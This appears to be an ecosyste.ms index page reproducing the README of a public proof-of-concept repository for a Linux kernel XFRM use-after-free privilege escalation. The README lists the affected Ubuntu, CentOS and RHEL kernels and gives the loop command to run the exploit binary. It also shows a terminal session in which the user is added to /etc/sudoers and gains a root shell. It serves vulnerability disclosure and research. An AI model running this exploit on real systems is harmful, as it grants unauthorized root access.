Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/duasynt/xfrm_poc

Linux kernel XFRM UAF poc (3.x - 5.x kernels)
https://github.com/duasynt/xfrm_poc

Last synced: 1 day ago
JSON representation

Linux kernel XFRM UAF poc (3.x - 5.x kernels)

Host: GitHub
URL: https://github.com/duasynt/xfrm_poc
Owner: duasynt
Created: 2020-02-27T23:36:55.000Z (over 4 years ago)
Default Branch: master
Last Pushed: 2020-02-28T18:06:37.000Z (over 4 years ago)
Last Synced: 2024-08-02T05:08:40.353Z (3 months ago)
Size: 169 KB
Stars: 132
Watchers: 11
Forks: 37
Open Issues: 3
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

README

## Linux kernel 3.x - 5.x XFRM UAF PoC

This is a poc for the [kernel
vulnerability](https://duasynt.com/blog/ubuntu-centos-redhat-privesc) that was
reported last year. CentOS was the last distribution to patch the bug in
January 2020.

The technical report is here https://duasynt.com/pub/vnik/01-0311-2018.pdf

Should work on all kernels with the build date before July - November 2019 on
the following distributions:

- Ubuntu 14.04 / 16.04 Server 4.4 LTS kernels
- CentOS 8 4.18 kernels
- Red Hat Enterprise Linux 8 4.18 kernels
- Ubuntu 18.04 Server LTS 4.15 kernels

Other distributions might be affected if:

- unprivileged usernamespaces are allowed
- xfrm support is compiled in or can be autoloaded
- the patch was not backported

It will probably take several tries to win the race (sometimes over 10
attempts), so run it in a loop just like it says:

```
$ while :; do ./lucky0 -q && break; done
```

On success, the current user is added to /etc/sudoers without a password.

```
[vnik@localhost ~]$ cat /etc/redhat-release
CentOS Linux release 8.1.1911 (Core)
[vnik@localhost ~]$ uname -a
Linux localhost.localdomain 4.18.0-80.11.2.el8_0.x86_64 #1 SMP Tue Sep 24 11:32:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
[vnik@localhost ~]$ while :; do ./lucky0 -q && break; done
[-] failed to win the race
[-] failed to win the race
[-] failed to win the race
[-] failed to win the race
[+] current user vnik was added to /etc/sudoers w/o a password. 'sudo -s' to get a shell
[vnik@localhost ~]$ sudo -s
[root@localhost vnik]#
```

**On 4.4.x kernels it may trigger a null oops but it's fully recoverable.**